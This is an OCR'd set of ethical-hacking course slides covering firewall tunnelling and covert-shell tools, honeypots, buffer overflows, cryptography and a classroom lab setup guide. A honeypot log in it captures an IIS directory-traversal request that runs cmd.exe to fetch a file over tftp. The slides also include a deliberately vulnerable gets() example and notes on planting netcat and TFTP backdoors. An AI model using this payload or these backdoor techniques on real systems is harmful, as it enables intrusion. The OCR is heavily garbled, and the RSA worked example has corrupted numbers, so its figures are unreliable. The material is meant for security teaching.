©http://www.nocrew.org/software/ httptunnel.html 

©Httptunnel creates a bidirectional virtual data path 
tunneled in HTTP requests. The requests can be sent via an 
HTTP proxy if desired so. 



C:\WINDOWS\System32\cmd.exe 

Tunnel 3.3>htc -help °~ ^ ~ 

Usage: htc [OPTION]... HOST [: PORT] 

Set up a httptunnel connection to PORT at HOST ^default port is 8888>. 
Jhen a connection is nade, I/O is redirected from the source specified 
by the — device.^ — ^£oruard-port or — stdin-stdout switch to the tunnel. 



— proxy-authorization USER: 
— proxy-author izat ion-f ile 
— proxy-buff er-size BVTES 

— content-length BVTES 

—device DEUICE 

— forward-port PORT 

— help 

— keep-aliue SECONDS 

— nax-connect ion-age SEC 

—pro xy H OS T Nft ME [ : PORT ] 
— stdin-stdout 

— strict-content-length 
— timeout TIME 

— user-agent STRING 
— version 
— no -daemon 



PASSUORD proxy authorization 

FILE proxy authorization file 

assume a proxy buffer size of BVTES bytes 

<k, M, and G postfixes recognized> 

use HTTP PUT requests of BVTES size 

<k, M, and G postfixes recognized^ 

use DEUICE for input and output 

use TCP port PORT for input and output 

display this help and exit 

send keepaliue bytes every SECONDS seconds 
^default is 5> 

maximum time a connection will stay 
open is SEC seconds ^default is 300> 
use a HTTP proxy ^default port is 8080> 
use stdin/stdout for communication 
^implies — no-daemon> 

always write Content-Length bytes in requests 

timeout, in milliseconds, before sending 

padding to a buffering proxy 

specify User-Agent value in HTTP requests 

output version information and exit 

don't fork into the background 



Id 
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Placing Backdoors through Firewalls 



The reverse www shell 

© This backdoor should work through any firewall and 
allow users to surf the WWW. A program is run on the 
i nternal host, which spawns a chi Id every day at a 
speci al ti nrie. 

0 F or the f i rewal I , thi s chi I d acts I i ke a user, usi ng hi s 
N etscape cl i ent to surf on the internet. I n reality, this 
child executes a local shell and connects to the www 
server operated by the hacker on the i nternet via a 
legitimate looking http request and sends it ready 
signal. 

© The legiti mate looki ng answer of the www server 
operated by the hacker are i n real ity the commands the 
child will execute on it's machine in the local shell. 
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Hiding Behind Covert Channel: Loki 



http://www.phrack.conn/ phrack/ 53/ P51-06 

© LOKI 2 is an information-tunneling program. LOKI uses 
I nternet Control M essage Protocol (I CM P) echo 
response packets to carry its payload. I CM P echo 
response packets are normal I y received by the Pi ng 
program, and many firewalls permit responses to pass. 

© Wetunnel simpleshell commands inside of 

I CM P_ ECH O / 1 CM P_ ECH ORE PLY and DNS name 
lookup query / reply traffic. To the network protocol 
analyzer, this traffic seems I ike ordinary benign packets 
of the corresponding protocol. To correct listener ( the 
LOKI 2 daemon) however, the packets are recognized 
for what they real I y are. 
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H acki ng Tool : 007 Shel I 



http :/ / www. sOftpj . org/ en/ docs, html 

© 007Shell is a Covert Shell I CMP Tunneling 
program. 1 1 works si mi I ar to Loki . 

© 1 1 works by putti ng data streams i n the I CM P 
message past the usual 4 bytes (8- bit type, 8- bit 
code and 16- bit checksum). 
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Hacking Tool: ICMPShel 



© ICMP Shell (ISH) is a telnet- like protocol. It 
Drovi des the capabi I ity of connecti ng a remote 
lost to open a shell using only I CM P for input 
and output. 

© The I SH server runs as a daemon on the server 
side. When the server receives a request from 
the client, it will stri p the header and look at the 
ID field, if it matches the server's ID then it will 
pi pe the data to "/ bi n/ sh". 

© 1 1 wi 1 1 then read the results from the pi pe and 
send them back to the cl i ent, where the cl i ent 
then pri nts the data to stdout. 
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ACK Tunneling 



© Trojans normally use ordinary TCP or UDP 
communication between their client and server parts. 

© Any f i rewal I between the attacker and the vi cti m that 
blocks incoming traffic will usually stop all trojansfrom 
worki ng. I CM P tunnel i ng has exi sted for quite some 
ti me now, but if you block I CM P i n the f i rewal I , you wi 1 1 
be safe from that. 

© ACK Tunnel i ng works through f i rewal Is that do not 
apply their rule sets on TCP ACK segments (ordinary 
packet f i Iters bel ong to thi s cl ass of f i rewal I s) . 
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H acki ng Tool : AckCmd 



http:/ / ntsecu r i ty. n u/ papers/ acktu n nel i ng 

• AckCmd is a client/ server combination for Windows 2000 that lets 
you open a remote command prompt to another system ( running 
the server part of AckCmd. 

• It communicates using only TCP ACK segments. This way the 
client component is able to directly contact the server component 
through firewall in some cases. 



^=v C:\WINDOWS\System32\cmd,exe - ackcmdc 127,0,0,7 


B 


B 




C:\DDcuiients and SettinsfsSOwnerSMi; DocumentsSEthical Hacking Lab Files u2 
ing\Module 19 - Hacking UPN, Routers and Fireualls\ackcnd>ackciids 


.3\Hack 




C = \Docuiients and Settings\Owner\Mv Docunents\Ethical Hacking Lab Files u2 
ing\Module 19 - Hacking UPN, Routers and Firewalls\ackcnd>ackciidc 127.0.0 


.3SHack 
.7 




(tckCiid 1-1 - The flck Comnand Prompt for Uindoiis 2000 

- <c> 2000p flrne Uidstron, arne -uidstronPntsecurity.nu 

- For instructions see http://ntsecuritv-nu/toolbox/ackciid/ 








Type "quit" and press Enter to quit 








ftckCnd> 
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H oney pots 



© H oney pots are programs that si mulate one or 
more network services that you designate on 
your computer's ports. 

© An attacl<er assumes that you are running 
vulnerable services that can be used to break 
into the machine. 

© A honey pot can be used to log access attempts 
to those ports i ncl udi ng the attacker's 
keystrokes. 

© This could give advanced warnings of a more 
concerted attack. 
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H oneypot Software Vendors 



1 Back Officer Friendly (http://www.nfr.com) 

2. Bait N Switch Honeypot (http://violating.us) 

3. B i gEye ( http:/ / vi ol ati ng. us) 

4. H oneyD( http:// www.citi .umich.edu/ u/ provos/ honeyd/ ) 

5. KF Sensor for Windows (http:// www. l<eyfocus. net/ l<f sensor/) 

6. LaBreaTarpit (http://www.hacl<busters.net) 

7. |V| anTrap (http://www.symantec.com) 

8. N etF acade ( http:/ / www. i tsecu re. bbn . com/ N etF acade. htm) 

9. Si ng! e- H oneypot ( http:/ / www. sou reef orge. net/ proj ects/ si ng! e- 
honeypot/ ) 

ID. Smol<e Detector 

(http:/ / pal isadesys.com/ products/ smokedetector/ ) 

n Specter (http://www.specter.ch) 

]2. Ti ny H oneypot ( http://www.al pi ni sta.org/ thp/ ) 

B. The Decepti on Tool kit ( http:/ / www.al I .net/ dtk/ ) 
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H oneypot- KF Sensor 



m 



Server — 

Running 
5 Stopped 
8 



Ports 

1^1 No recent activity 

^1 Recent Activity 

1^1 Very Recent Activity 

^\ Inactive 

1^1 Error 



Visitors 

^ No recent activity 
JiL Activity 

Very Recent Activity 

Events 

O'" Normal Event 
<^ Alert 
I5P High Alert 



Event Details 



Event 
Start Time: 



17/12/2002 18:45:36.623 



End Time: 
Description: 



17/12/2002 18:45:36.623 



Event ID: 
Type: 



418 



Connection 



Visitor 
IP: 

Domain: 

Sensor 
IP: 

Bound: 
Action: 



217.39.205.180 



Port: 



4779 



host2 1 7-39-205- 1 80 . in-addr . btopen world . com 



217.39.97.38 



SimBanner 



Port: 
Protocol: 
Sim Server: 



SO 



TCP 



httpApache 



Details 
Closed By: 

Received: 



Server 



Limit Exceeded: 



GET /scripts/ . . %%35%63 . . / winnt/system32/cmd . exe?/c+tf tp%20-i%2 a 
Host: www ^ 
Connnection: close — 

V 

< .1 >~ 



Response: 



HTTP/ 1.1 200 OK 

Date: Tue, 17 Dec 2002 18:45:36 GMT 
Server: Apache/2.0.39 (Win32) 
Connection[jasper]: close 




±1 


2.~ 



Next 



Previous 



Close 
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Summary 



© Intrusion Detection Systems(IDS) monitors packets on the network wire and 
attempts to discover if a hacker/ hacker is attempti ng to break i nto a system 

© System Integrity Verifiers (SI V) monitor system files to find when an intruder 
changes. Tri pwi re is one of the popular SI Vs. 

© I ntrusion Detection happens either by Anomaly detection or Signature 
recognition. 

© An I DS consists of a special TCP/ 1 P stack that reassembles I P datagrams and 
TCP streams. 

© A simple Protocol verification system can flag invalid packets. This can 

include valid, by suspicious, behavior such as severally fragmented I P packets 

© I n order to effectively detect i ntrusions that use i nval id protocol behavior, 
I DS must re- implement a wide variety of application-layer protocols to 
detect suspicious or invalid behavior. 

© One of the easi est and most common ways for an attacker to si i p by a f i rewal I 
is by i nstal I i ng network software on an i nternal system that usi nes a port 
address permitted by the firewall's configuration. 

© H oney pots are programs that si mulate one or more network services that 
you designate on your computer's ports. 
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Ethical Hacking 



ModuleXX 
Buffer Overflows 



Module Objective 



© What is a Buffer Overflow? 
© Exploitation 

© H ow to detect Buffer Overflows i n a program? 

© Skills required 

© CPU / OS Dependency 

© Understanding Stacks 

© Stack Based Buffer Overflows 

© Technical details 

© Writing your own exploits 

© Defense agai nst Buffer Overflows 
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On Oct 19 2000, hundredsof flights were grounded or delayed 
because of a software problenn 1 n the Los Angeles ai r traffic 
control system. The cause was attri buted to M exican Control I er 
typi ng 9 (i nstead of 5) characters of fl ight-descri ption data, 
resulting in a buffer overflow. 



Buffer Overflows 



0 A buffer overrun is when a program al locates a block of memory of a 
certai n length and then tries to stuff too much data i nto the buffer, 
with extra overflowing and overwriting possibly critical information 
crucial to the normal execution of the program. Consider the foil owing 
source code: 

© When the source is compiled and turned into a program and the 
program is run, it will assign a blockof memory 32 "bytes long to hold 
the name string. 

iinolude <stdio.h> 

int main ( } 

{ 

char name [31] ; 

printf ("Please "bype your namer 
gets (name) ; 

printf { " Efello, %s" , name); 
return 0; 

} 

Buffer overflow will occur if you enter: 

'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAA 
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Exploitation 



0 Buffer overflow attacks depend on two thi ngs: the lack 
of boundary testing and a machine that can execute 
code that resi des i n the data/ stack segment. 

© The lack of boundary is very common and usually the 
program ends with segmentation fault or bus error. I n 
order to exploit buffer overflow to gain access or 
escal ate pr i vi I eges, the offender must create the data to 
be fed to the appi i cati on . 

© Random data wi 1 1 generate a segmentation fault or bus 
error, never a remote shel I or the execution of a 
command. 
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stack based Buffer Overflow 



0 Buffer is expecti ng a maxi mum number of guests. 

© Send the buffer more than x guests 

0 I f the system does not perform boundary checks, extra 
guests continue to be placed at positions beyond the 
legitimate locations within the buffer. (J ava does not 
permit you to run off the end of an array or stri ng as C 
and C++ do) 

© |V| al i ci ous code can be pushed on the stacl<. 

© The overflow can overwrite the return poi nter so flow of 
control switches to the mal icious code. 
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Knowledge required to Program Buffer 
Overflow Exploits 



1 C functions and the stack 

2. A little l<nowledgeof assembly/ machine language. 

3. H ow system cal Is are made ( at the level of machi ne 
code level). 

4. exec( ) system calls 

5. H ow to 'guess' some key parameters. 
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© Thestackisa(LIFO) 
mechanism that 
computers use both to 
Dass arguments to 
'unctions and to 
reference local variables. 

0 1 1 acts I i ke a buffer, 
holding all of the 
information that the 
function needs. 

© The stack is created at 
the beginning of a 
function and released at 
the end of it. 
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Bottom of 
Memory 



Buffer 2 
(Local Vaiiable 2) 



Buffer 1 
(Local Vmiable 1) 



Retiirii Pointer 

Fmictioii CiiU 
Ai'j^iiiieiits 



Top of 
Memoiy 



U nderstandi ng Assembly Language 



Two most important operations in a stack: 

• 1 Push - put one itenn on the top of the stack 

• 2. Pop - "rennove" one itenn fronn the top of the stack 

• typical ly returns the contents poi nted to by a poi nter and 
changes the poi nter (not the nnennory contents) 

« EIP The extended instruction pointer. This point to the code that you are currently 
. executing . When yo u call a fu notion , this gets saved o n the stack for later use . 

s ESP The extended stack pointer. This points to the current position on the stack 
and allows things to be added and removed from the stack using push and pop 
operations or direct stack pointer manipulations. 

* EBP The extended base pointer. This register should stay the same throughout 
the lifetime of the function. It serves as a static point for referencing stack-based 
information like vahables and data in a function using offsets. This almost always 
points to the top of the stack for a function . | 
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A Normal Stack 




CIP 



saved registers 



focal variables 



args 



saved registers 



rocal variables 



T 
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Stack frame 



esp 



H ow to detect Buffer Overflows i n a 
program 



There are two ways to detect buffer overflows. 

• The first one is looking at the source code. In this 
case, the hacker can look for strings declared as local 
variables in functions or methods and verify the 
presence of boundary checks. 1 1 is also necessary to 
check for improper use of standard functions, 
especially those related to strings and in put/ output. 

• The second way i s by f eedi ng the appi i cati on with 
huge amounts of data and check for abnormal 
behavior. 
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Attacking a real Program 



0 Assuming that a String fundi on is being exploited, the 
attacker can send a long stri ng as the i nput. 

© This stri ng overflows the buffer and causes a 
segmentation error. 

0 The return pointer of the function is overwritten and 
the attacker succeeds in altering the flow of execution. 

0 I f he has to i nsert his code i n the i nput he has to: 

• Know the exact address on the stack 

• Know the size of the stack 

• M akethe return pointer point to his code for execution 
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NOPS 



© Most CPUs have a No ® 
Operation instruction 
- it does nothing but 
advance instruction 
pointer. 

© Usually we can put 
some of these ahead 

© 

of our program (in 
the string) 

© As long as the new 
return address points 
to a NOP we are OK 
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Attacker pad the begi nni ng of the 
intended buffer overflow with a 
long run of NOP instructions (a 
N OP si i de or si ed) so the CPU wi 1 1 
do nothi ng ti 1 1 it gets to the 'mai n 
event' (which preceded the 'return 
pointer') 

Most intrusion detection Systems 

(IDS) look for signatures of NOP 

sleds ADM utate (by K2) accepts a 

buffer overflow exploit as input 

and randomly creates a 

f u ncti onal I y equ i val ent versi on 

(polymorphism) 



H ow to mutate a Buffer Overflow 
Exploit 



For the NOP portion 

Randomly replace the NOPs with functionally 
equivalent segments of code (e.g.: x++; x-; ? NOP NOP) 

For the "main event" 

Apply XOR to combine code with a random key 
unintelligible to IDS and CPU code must also decode 
the gibberish in time to run decoder is itself 
polymorphic, so hard to spot 

For the "return pointer" 

Randomly tweak LSB of pointer to land in NOP-zone. 
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Once the stack is smashed.. 



I 



Once vul nerable process is commandeered, the attacker 
has the same privi leges as the process can gai n normal 
access, then exploit a local buffer overflow vulnerability 
to gain super- user access. 

Create a backdoor 

Using (UNIX-specific) inetd 

Using Trivial FTP (TFTP) included with Windows 2000 
and some U N I X f I avors 

U se N etcat to make raw, i nteracti ve con necti on 

Shoot back an Xterminal connection 

UNIX-specific GUI 



Defense agai nst Buffer Overflows 



© Manual auditing of 
code 

© Disabling Stack 
Execution 

© Safer C I i brary 
support 

© Compiler 
Techniques 
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StackGuard 



0 StackGuard: Protects Systems From Stack Smashing 
Attacks 

© StackGuard is a compiler approach for defending 
programs and systems against "stack smashing" attacks. 

© Programs that have been compi led with StackGuard are 
largely immune to Stack smashing attack. 

© Protection requi res no source code changes at al I . when 
a vulnerability is exploited, StackGuard detects the 
attack in progress, raises an intrusion alert, and halts 
the victim program. 

http://www.cse.ogi .edu/ Dl SC/ projects/ i mmunix/ StackGuard/ 
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I mmunix System 



0 I mmunix System 7 is an Immunix-enabled RedHat 
Linux 7.0 distribution and suite of application- level 
security tools. 

© I mmunix secures a Linux OS and applications 

© I mmunix works by harden i ng existi ng software 
components and platforms so that attempts to exploit 
security vulnerabilities will fail safe. i.e. the 
compromised process halts instead of giving control to 
the attacker, and then is restarted. 

http://immunix.org 
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Vulnerability Search - 1 CAT 



The ICATteam 
appreciates the 
contributions and 
support of the following 
organizations: CERIA^p, 
FedCIRC. ISS X- 



Search tips: 

All drop down menus are ANDed together to create a query. 

Click a link below to look up vulnerabilities by vendor or product name 

represents non -alphabetic characters 
Double -quotes are ignored in text-search; Individual words are ANDed together. 



Search-> 

Vendor 
Product 
Version 

Keyword search 

(try a CVE or CAN name) 

Severity 

General Filters: 
Common Sources 
Related exploit range 
Vulnerability consequE 
Vulnerability type 



Entry type 

Entries since the following 
date 



All entries | 


1 Year | 


6 Months 1 


3 Months 1 


Resetvalues | 




.A..B C..E F..H I..K 


L.N 0..Q R..T U..W X..Z Al 



...A..B C..E F..H I..K L.N 0..Q R..T U..W X..Z All 

— Choose a Vendor or Product — 




Any 


d 


Remote 




|Any 




1 (buffer overflow) 


d 


|Any 


d 


CVE entries 


d 



I Any Month |2003 21 
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Summary 



0 A buffer overflow occurs when a program or process 
tries to store more data i n a buffer (temporary data 
storage area) than it was intended to hold. 

© Buffer overflow attacks depend on two thi ngs: the lack 
of boundary testing and a machine that can execute 
code that resi des i n the data/ stack segment. 

0 B uff er Overf I ows vu I nerabi I i ty can be detected by 
ski led auditi ng of the code as we! I as boundary testi ng. 

0 Once the stack is smashed the attacker can deploy his 
payload and take control of the attacked system. 

0 Countermeasures include: checki ng the code, Disabling 
Stack Execution, Safer C library support, using safer 
Compi I er Tech n i ques. 

0 Toolslikestackguard, I mmunix and vulnerability 
scanners help securing systems. 
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Ethical Hacking 



ModuleXXI 
Cryptography 



Module Objective 



© WhatisPKI 

© RSA 
© MD-5 
©SHA 
©SSL 
© PGP 
©SSH 

© Encryption Cracking Techniques 
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Publ ic-key Cryptography 



0 Publ i c- key cryptography was i n vented i n 1976 by 
Whitfield Diffieand Martin Hellman. 

0 I n this system, each person gets a pai r of keys, cal led 
the public key and the private key. 

0 Each person's public key is published whilethe private 
key is kept secret. 

0 Anyone can send a confidential message just using 
public information, but it can only be decrypted with a 
pr i vate key that i s i n the sol e possessi on of the i ntended 
recipient. 
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Worki ng of E ncrypti on 
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Digital Signature 



Dcctiment 



Sender 



Sgnecf Dccumen! 

Signet UFO 



Hash 
A^cofithm 




I 
I 

I 



S gned Oocument 













Di glial 


: 




1 ^ 

c Key 
f Encfypiion 


Publ i: Key 
EncrypHon 










Scridcf s 
Key 




Original 



Document 



1 



Message 

Hash 
Algorithm 
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RSA (Rivest Shamir Adleman) 



© RSA i s a publ i c- key cryptosystem devel oped by M I T 
professors Ronald L Rivest Adi Shamir, Leonard M 
Adleman in 1977 in an effort to help ensure internet 
security. 

0 RSA uses modular arithmetic and elementary number 
theory to do computati on usi ng two very I arge pri me 
numbers. 

© RSA encryption is widely used and is the 'de-facto' 
encryption standard. 
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Example of RSA algorithm 



JP ill <- first prime number [destroy this after computing E and D) 

0 ^ 53 <- second prime nunftjer (destroy this after computing E and D) 

PQ * 3233 <- iTtodulus [give this co others) 

E *= 17 <- public exponent ^give this to others) 

D - *733 <- private exponent [keep this secret') 



Vour i^iiblic key is (E,PQ) . 
Vour i>rivate key is I>. 

The ancry^ tian f unct ion is : 



encrypt (T) = (T'^E) mod PQ 

= (T^17] mod 3233 



The decryti tion f unct ion is : 



decrypt (C) = (C^D) mod PQ 

= [C^27S3) irod 3233 



To encrypt the plaintext value 123 ^ do chis: 



encrypt (123) = (123^17) mod 3233 

= 3375S79i7^^66537iS59659£95aei7679e03 mo^ 3233 
= 855 



To decrypt the cipherte^^t value SSS^ do this; 

decrypt (£55) = (SS5"^27S3] mod 3233 
= 123 
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RSA Attacks 



© Brute ford ng RSA factor! ng 

© Esoteric attack 

© Chosen ci pher text attack 

© Low encryption exponent attack 

© Error analysis 

© Other attacks 



MD5 



© The M D5 algorithm takes as i nput a message of 
arbitrary length and produces as output a 128- 
bit "fingerprint" or "message digest" digest of 
the input. 

© The M D5 algorithm is intended for digital 
signature applications, where a large file must 
be "compressed" in a secure manner before 
being encrypted with a private (secret) key 
under a public-key cryptosystem such as RSA. 
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SHA (Secure Hash Algorithm) 



© The SH A algorithm takes as i nput a message of 
arbitrary length and produces as output a 160- 
bit " fingerprint" or "message digest" of the 
input. 

© The algorithm is slightly slower than MD5, but 
the larger message digest makes it more secret 
against brute-force colli si on and inversion 
attacks. 
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SSL (Secure Socket Layer) 



L 



© SSL stands for Secure Sockets Layer, SSL is a 
protocol developed by Netscape for 
transmitti ng private documents vi a the 
I nternet. 

© SSL works by usi ng a private key to encrypt 
data that is transferred over the SSL 
connection. 



© SSL Protocol is application protocol 
independent. 



RC5 



© RC5 is a fast block cipher designed by RSA Security in 
1994. 

© It is a parameterized algorithm with a variable block 
size, a variable key size and a variable number of 
rounds. The key size is 128 bit. 

© RC6 is a block cipher based on RC5. Like RC5, RC6 is a 
parameterized algorithm where the block size, the key 
size and the number of rounds are variable again. The 
upper limit on the key size is 2040 bits. 
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WhatisSSH? 



0 The program SSH (Secure Shell) is a secure 
replacement for tel net and the Berkeley r-uti I i ties 
(riogin, rsh, rep and rdist). 

© 1 1 provides an encrypted channel for loggi ng i nto 
another computer over a network, executi ng commands 
on a remote computer, and movi ng fi les from one 
computer to another. 

© SSH provides a strong host- to host and user 
authentication as well as secure encrypted 
communications over an insecure internet. 

© SSH 2 is a more secure, efficient and portable version of 
SSH that includes SFTP, an SSH 2 tunneled FTP. 
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Government Access to Keys (GAK) 



© Government Access to Keys ( also known as key escrow) 
means that software compan i es wi 1 1 gi ve copi es of al I 
keys ( or at least enough of the key that the remai nder 
could be cracked very easi ly) to the government. 

© The government promises that they would hold the keys 
i n a secure way and only use them to crack keys when a 
court issues a warrant to do so. 

© To the government thi s 1 ssue i s si mi I ar to the abi I i ty to 
wiretap phones. 
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RSA Challenge 



Challenge Number 


Prize (JUS) 


Status 


Submission Date 


Submitter(s) 


RSA-576 


$10,000 


Not Factored 






RSA-640 


$20,000 


Not Factored 






RSA-704 


$30,000 


Not Factored 






RSA-768 


$50,000 


Not Factored 






RSA-396 


$75,000 


Not Factored 






RSA- 1024 


$100,000 


Not Factored 






RSA- 1536 


$150,000 


Not Factored 






RSA-2048 


$200,000 


Not Factored 







0 The RSA Factoring challenge is an effort, sponsored by 
RSA Laboratories, to learn about the actual difficulty of 
factori ng I arge numbers of the type used i n RSA keys. 

0 A set of eight challenge numbers, ranging in size from 
576 bits to 2048 bits are given. 



Bl-Council 



www.distributed.net 

© An attempt to crack RC5 encryption usi ng networl< of 
computers world wide 

© The client utility when downloaded from distributed.net 
runs the crack algorithm as Screensaver and send 
resu I ts to the d i str i buted . net con nected servers. 

© The challenge is still running... 
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PGP Pretty Good Privacy 



© Pretty Good Privacy (PGP) is a software pacl<age 
originally developed by Philip R Zimmermann that 
provides cryptographic routines for emails and file 
storage appi i cati ons. 

© Zi mmermann took exi sti ng cryptosystems and 
cryptographic protocols and developed a program that 
can run on multiple platforms. It provides message 
encryption, digital signatures, data compression and e- 
mail compatibility. 



Hacking Tool: PGP Crack 



http://munitionsjgluxjb.neiydolphin.cgi?ad:ion=render& 
category=0406 

0 PGP crack is a program designed to brute-force a 
conventionally encrypted file with PGP or a PGP secret 
key. 

© Thefile"pgpfile" must not be ascii-armored. The file 
"phrase! i St" should be a file containing all of the 
passph rases that wi 1 1 be used to attempt to crack the 
encrypted file. 
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Summary 



© Using Public Key I nfrastructure(PKI), anyonecan send a confidential 
message using public information, which can only be decrypted with a 
private key i n the sole possession of the i ntended reci pient. 

0 RSA encryption is widely used and is a 'de-facto' encryption standard. 

© TheMDS algorithm is intended for digital signature applications, 
where a large file must be compressed securely before being encrypted 

© SH A algorithm takes as input a message of arbitrary length and 
produces as output a 160-bit message digest of the i nput. 

© Secure Sockets Layer, SSL is a protocol for transmitti ng private 
documents via the I nternet. 

© RC5 is a fast block cipher designed by RSA Security. 

© SSH (SecureShell) isasecurereplacementfortelnetand theBerkeley 
r-utilities and this provides an encrypted channel for logging into 
another computer over a network, executing commands on a remote 
computer, and movi ng f i les from one computer to another. 
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CEH LAB SETUP v3 

Document overview 

This document provides background information for technical staff responsible for setting up a training room facility for 
the CEH course. This guide describes the requirements for the network equipment and computer stations that are 
installed and configured by the facilities personnel for the training courses. 



Training room environment 

The training room environment consists primarily of the following equipment: 



Equipment 


Number 
(Class of 12 students) 


Operating System 


iVIinimum 
System Requirements 


Student 
Workstations 


12 


Windows 2000 Server w/o SP 


Pentium-based PC with 4 GB free 
disk space, 128 MB RAM, 1 NIC 
(disable or unplug extras), 15- 
inch monitor and cards to drive 
at 800 X 600 (or at monitor's 
native resolution) and configured 
at 256 colors, and compatible 
mouse 


Instructor Station 


1 


Windows 2000 Server w/o SP 


Pentium-based PC with 10GB 
free disk space, 128 MB RAM, 1 
NIC (disable or unplug extras), 
15-inch monitor and cards to 
drive at 800 x 600 (or at 
monitor's native resolution) and 
configured at 256 colors, and 
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compatible mouse, Wireless Card 


Instructor Station 


1 


RedHat Linux 8 or 9 


Pentium-based PC with 10GB 
free disk space, 128 MB RAM, 1 
NIC (disable or unplug extras), 
15-inch monitor and cards to 
drive at 800 x 600 (or at 
monitor's native resolution) and 
configured at 256 colors, and 
compatible mouse 


Victim Machine 


1 


Windows 2000 Server w/o SP 


Pentium-based PC with 10GB 
free disk space, 128 MB RAM, 1 
NIC (disable or unplug extras), 
15-inch monitor and cards to 
drive at 800 x 600 (or at 
monitor's native resolution) and 
configured at 256 colors, and 
compatible mouse 



Instructor's computer 

The instructor's computer must; 

■ Be installed with Windows 2000 Professional w/o SP 

■ Be installed with SQL Server 2000 w/o SP 

■ Be running Microsoft Internet Information Server (IIS) 

■ Be running IP protocol. IPX is required if demonstrating NetWare hacking (optional) 

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 
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■ Have PowerPoint, Word and Excel installed 

■ Have Adobe Acrobat, WinZip installed 

■ Install VMWare (Download evaluation registration key from VMWare website) 

■ Have an Overhead Projector connected 

■ Have a CD-ROM as part of its hardware 

■ Set Windows Explorer to show all files and file types and extensions. 

■ The use of Ghost images is recommended to reduce setup time if computer failure occurs. If using Ghost, the 
Instructor's computer should have an 8 GB hard drive that consists of a 4 GB FAT partition for NT and at least one 
other partition on which to store images of the computers. 

If using NetWare. 1 pc should also be running (optional); 

■ Client 32 version 4.7+ 

■ NWAdmin 

■ RConsole 

■ NetWare administrator user ID = administrator, no password 

Student workstations 

Student workstations must; 

■ Be installed with Windows 2000 Professional w/o SP 

■ Be installed with IIS 

■ Be running IP (IPX and NetBIOS compatible protocols required if using NetWare - optional) 

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 

■ Set Windows Explorer to show all files and file types. 

■ Have Adobe Acrobat, WinZip installed 

■ Install VMWare (Download evaluation registration key from VMWare website) 

■ Install Matrix screen saver located in hacking CD-ROM\Miscellaneous directory - set the time to 15 mins. 

■ Download the CEH desktop wallpaper from http://www.eccouncil.org/classroom/background.ipg and set up the 
downloaded image as Windows background wallpaper. 
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Victim woricstation 

victim workstation must; 

■ Be installed with Windows 2000 Professional w/o SP 

■ Be installed with SQL Server 2000 w/o SP 

■ Be installed with IIS 

■ Be running IP (IPX and NetBios compatible protocols required if using 

■ NetWare) 

■ Contain all hacking tools from the CD-ROM resident on the hard drive in c:\tools 

■ Contain all Windows 2000 source files in c:\i386 

■ Set Windows Explorer to show all files and file types. 



Room environment 

■ The room must contain a whiteboard measuring a minimum of 1 yard by 

■ 2-3 yards in length (1 V2 meter by 2-3 meters). 

■ The room should contain an easel and large tablet. 

■ The room must be equipped with legible black and blue felt tip pens (CHISEL-Point, not fine-tip). 



Classroom configuration 

The configuration of this classroom is modular. Computers can be added or removed by either row or column, depending 
on the needs of the particular class. The following is a sample room setup that provides optimal support. This setup allows 
for ease of access to "troublespots" by the instructor, and allows students to break into functional small and larger teams. 
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victim Machine 



I 



Windows 2000 Server Wiio SP 
Microsoft SQL Strver 
IIS 5.0 



r 



Instructor Machines 



k 



LB 




Wireless Access Point 
(N&eded tor y^reless 
Hacking Module) 



WflridciiN^ 2000 Server 
Microsoft SQL Server ^tjd m\ Unuit 
^reless LAM card 



Internet Access 




Hub or Switch 



CLASSROOM SETUP 



» t f t t t 



^— Students's Machine 

Windows 2O0O Server w/o SP 

Booltne students PC usln^ CD-ROhl bootable Linux fof labs usln^ Linux tools sucfi a& nmap/hplng£j'dsnltf/arpspoof/clnspoor 
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Set up the machines based on the classroom setup diagram. The lab exercises for the students are instructor led and they 
are based on the hacking tools in the trainer slides. The instructor is encouraged to demonstrate and guide the students on 
the usage of the hacking tools against the Victim's computer. Do not encourage live hacking on the Internet using these 
tools in the classroom. Please feel free to include your own exercises. 

Instructor PC Requirements 
Machine i 

Windows 2000 Server w/ SPo or SPi 
Microsoft SQL Server 2000 
Optional: Wireless LAN Card 
Optional: Wireless Access Points 

Machine 2 

RedHat Linux 7 or 8 

Victim IVIachine Requirements 

Windows 2000 Server (No service pack) default installation 

Student IVIachine Requirements 

Machine 1: Windows 2000 Server w/ SPo or SPi 

Machine 2: Optional: Machine with CD-ROM bootable Linux 
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Network topology 

The training room must be physically isolated from any production network. Students must be able to access the Internet 
from their PCs. All computers are connected as one isolated network and domain. The common protocol is IP. All 
computers should have dynamic IP addresses using DHCP server. This reduces potential problems when booting from 
Linux bootable CD-ROM. NICs can be loMbit or lOoMbit (lOoMbit is recommended). Hub is recommended instead of a 
switch (helpful in demonstrating Sniffer module) Cables must be bundled and tied out of pathways and work areas, and 
of sufficient length as not to be under stress. 

Instructor acceptance 

Before the training class is scheduled to begin, the instructor will visit the training facility to inspect and accept the setup. 
The technical contact (System Administrator) for the facility must be available to answer questions and correct any setup 
issues. Both the instructor and the facility technical contact will ensure completion of the following checklists before the 
training setup is deemed acceptable. 



Checklists 

Check the following on all PCs 



Tick Here 


List 


□ 


Open Network Neighborhood. Verify that all classroom computers are visible in Network Neighborhood 


□ 


Verify that the Windows OS source files are on the computer in c:\i386. 


□ 


Verify that the hacking tools are on the computer in c:\tools. 


□ 


Verify that Internet access is available. 


□ 


Visit http://www.eccouncil.org and view the page to check Internet access. 


□ 


Open Command Prompt and type ping eccouncil.org and look for connection to the server. 


□ 


Verify Microsoft PowerPoint, Word, Excel are installed. 
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□ 


Verify Acrobat and Winzip are installed. 


□ 

1 1 


Verify that the Instructor computer can image through the overhead projector. 


□ 


Verify each computer has 2 GB or more free disk space. 


□ 

1 1 


Verify Windows Explorer is set to show all files and file type including hidden files and extensions. 

J i: J xT CD 


□ 

1 1 


Verify if you can successfully boot using CD-ROM bootable EC-Council Linux CD-ROM 

J J J CD 


□ 


Cable Wiring organized and labeled 


□ 


Student Workstations and chair placement satisfactory 


□ 


Placement of LCD (overhead) projector appropriate 


n 


Whiteboard and dry erase markers and eraser are available 


n 


Instructor station properly organized and oriented 

XT XT J CD 


□ 


Computers are labeled with client number. 


□ 


EC-Council courseware's available for students. 


□ 


Write down the facility's technical contact person's hand phone number. Contact him in case of network 
problem. 


□ 


Verify the configuration of CEH wallpaper on the desktop - black background with CEH logo at the center 


□ 


